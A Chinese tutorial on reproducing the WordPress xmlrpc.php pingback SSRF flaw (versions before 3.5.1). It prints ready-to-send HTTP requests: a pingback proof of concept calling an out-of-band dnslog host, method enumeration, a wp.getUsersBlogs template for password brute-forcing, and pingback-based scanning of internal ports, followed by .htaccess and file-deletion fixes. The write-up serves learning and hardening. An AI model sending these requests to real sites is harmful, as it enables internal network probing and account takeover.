复现WordPress xmlrpc.php漏洞和SSRF的详细步骤

 更新时间:2022年04月02日 15:45:15   作者:xiaochuhe.  
这篇文章主要介绍了复现WordPress xmlrpc.php漏洞和SSRF的相关资料,本文给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下

一、漏洞介绍

通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery,SSRF)和远程端口扫描。

二、漏洞影响

WordPress 版本< 3.5.1

造成的影响
1、可以对业务内网进行探测。
2、攻击运行在内网或本地的应用程序(比如溢出攻击)。
3、利用file协议读取本地文件等

三、漏洞复现

第一步:直接访问这个文件,初步判断

第二步:发现POC验证数据包 

POST /xmlrpc.php HTTP/1.1
Host: www.目标.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 310
 
<?xml version="1.0" encoding="iso-8859-1"?>
    <methodCall>
    <methodName>pingback.ping</methodName>
    <params>
    <param><value><string>http://g8o53x.dnslog.cn/</string></value></param>
    <param><value><string>http://www.目标.com/?p=1</string></value></param>
    </params>
    </methodCall>

发送数据包

验证成功 !

四、深入利用

(一)查看系统允许的方法

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99
......
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

 (二)账号爆破

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99
......
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>password</value></param>
</params>
</methodCall>

(三)通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery,SSRF)和远程端口扫描。

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99
.......
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>要探测的ip和端口:http://127.0.0.1:80</string></value>
</param><param><value><string>要探测的URL</string>
</value></param></params>
</methodCall>

五、漏洞修复

(一)通过APACHE的.htaccess屏蔽xmlrpc.php文件的访问。配置代码如下:

# protect xmlrpc
<Files "xmlrpc.php">
Order Allow,Deny
Deny from all
</Files>

(二)删除根目录下的xmlrpc.php。

到此这篇关于复现WordPress xmlrpc.php漏洞和SSRF的文章就介绍到这了,更多相关WordPress漏洞复现内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!

相关文章

  • PHP解决高并发的优化方案实例

    PHP解决高并发的优化方案实例

    这篇文章主要介绍了PHP解决高并发的优化方案实例,介绍的非常详细,对这块不太明白的小伙伴可以跟随小编一起来探讨研究吧!
    2020-12-12
  • thinkPHP3.2简单实现文件上传的方法

    thinkPHP3.2简单实现文件上传的方法

    这篇文章主要介绍了thinkPHP3.2简单实现文件上传的方法,重点介绍了thinkPHP实现文件上传功能的控制器文件相关技巧,需要的朋友可以参考下
    2016-05-05
  • 神盾加密解密教程(二)PHP 神盾解密

    神盾加密解密教程(二)PHP 神盾解密

    前些日子一个朋友丢了个shell给我,让我帮忙解密,打开源码看了下写着是 “神盾加密” , 牛逼闪闪的样子、 百度下发现神盾是个很古老的东西,最后一次更新是在 2012-10-09。和他相似的另一款是phpjm,有人说是神盾抄袭phpjm的,这些都不是我们所要关心的问题、phpjm一直在更新,而神盾貌似不搞了,我们分析下神盾,顺便写成工具,方便大家使用(因为他不更新,所以就不用担心解密工具失效问题了)。
    2014-06-06
  • 如何在Laravel5.8中正确地应用Repository设计模式

    如何在Laravel5.8中正确地应用Repository设计模式

    这篇文章主要介绍了如何在Laravel5.8中正确地应用Repository设计模式,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
    2019-11-11
  • php接口和抽象类使用示例详解

    php接口和抽象类使用示例详解

    这篇文章主要介绍了php的接口和抽象类使用示例,并做了详解讲解,需要的朋友可以参考下
    2014-03-03
  • Yii2框架数据验证操作实例详解

    Yii2框架数据验证操作实例详解

    这篇文章主要介绍了Yii2框架数据验证操作,结合实例形式详细分析了Yii框架常见数据验证操作的原理、实现方法及相关操作技巧,需要的朋友可以参考下
    2018-05-05
  • Yii2实现中国省市区三级联动实例

    Yii2实现中国省市区三级联动实例

    本篇文章主要介绍了Yii2实现中国省市区三级联动实例,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
    2017-02-02
  • PHP中的运算符使用示例详细指南

    PHP中的运算符使用示例详细指南

    这篇文章主要为大家介绍了PHP中的运算符使用示例详细指南,有需要的朋友可以借鉴参考下,希望能够有所帮助,祝大家多多进步,早日升职加薪
    2022-08-08
  • PHP简单留言本功能实现代码

    PHP简单留言本功能实现代码

    这篇文章主要为大家详细介绍了PHP简单留言本功能的实现代码,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
    2017-06-06
  • Yii框架的redis命令使用方法简单示例

    Yii框架的redis命令使用方法简单示例

    这篇文章主要介绍了Yii框架的redis命令使用方法,结合简单实例形式分析了Yii框架redis命令相关的过期时间设置、数据存储、添加、删除、输出等操作技巧,需要的朋友可以参考下
    2019-10-10

最新评论